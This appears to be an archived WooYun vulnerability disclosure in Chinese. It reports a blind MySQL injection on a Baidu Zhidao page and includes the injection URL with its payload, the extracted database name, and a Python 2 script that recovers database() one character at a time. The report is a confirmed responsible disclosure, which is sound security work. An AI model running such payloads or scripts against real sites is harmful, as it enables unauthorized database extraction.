百度某站点MySQL注射(附验证脚本)

编号89469
Urlhttp://www.wooyun.org/bug.php?action=view&id=89469
漏洞状态厂商已经确认
漏洞标题百度某站点MySQL注射(附验证脚本)
漏洞类型SQL注射漏洞
厂商百度
白帽子lijiejie
提交日期2014-12-31 10:53:00
公开日期2015-02-14 10:54:00
修复时间(not set)
确认时间2014-12-31 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank10
漏洞简介
百度某站点MySQL注射(附验证脚本)
漏洞细节

注射点:

http://zhidao.baidu.com/c/ah189" and mid(lower(database()),1,1)="c" and "1"="1


以上猜解database()第一个字符是c。

POC

猜解database(),得到:

company


baidu.com_mysqli.png


猜解user(),得到:

[email protected]*


baidu.com_mysqli_user.png


验证脚本:

#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('[email protected]_.')
print 'Try to retrive database():'
user = ''
for i in range(1, 8):
for payload in payloads:
conn = httplib.HTTPConnection('zhidao.baidu.com', timeout=60)
s = '" and mid(lower(database()),%s,1)="%s" and "1"="1' % (i, payload)
conn.request(method='GET',
url= '/c/ah189' + urllib.quote(s),
headers = headers)
html_doc = conn.getresponse().read().decode('utf-8')
if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0:
user += payload
print '\n[In Progress]', user
break
else:
print '.',
conn.close()
print '\n[Done], current db is', user

修复方案

过滤

状态信息 2014-12-31: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-14: 细节向公众公开
厂商回复感谢提交,已通知业务部门处理
回应信息危害等级:高漏洞Rank:10 确认时间:2014-12-31 15:48
Showing 1-14 of 14 items.
评论内容评论人点赞数评论时间

@ lijiejie 你绝对有神器!

dir02015-02-14 12:58:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

0c0c0f02014-12-31 19:27:00

我靠居然是这个站。。 @lijiejie 你绝对有神器!

depycode02014-12-31 15:59:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

帅气小狼狗02014-12-31 14:06:00

李姐姐猪肉太强了。

老笨蛋02014-12-31 12:23:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

红客十年02014-12-31 12:13:00

到底是哪个站...

子非海绵宝宝02014-12-31 11:54:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

宝-宝02014-12-31 11:44:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

D_in02014-12-31 11:39:00

我靠居然是这个站。。 @lijiejie 你绝对有神器!

龍 、02014-12-31 11:15:00

直接写原生SQL啊

wusuopubupt02014-12-31 11:13:00

我靠居然是这个站。。 @lijiejie 你绝对有神器!

小 葛02014-12-31 11:04:00

我靠到底是哪个站。。 @lijiejie 你绝对有神器!

玉林嘎02014-12-31 10:55:00

我靠居然是这个站。。 @lijiejie 你绝对有神器!

疯狗02014-12-31 10:54:00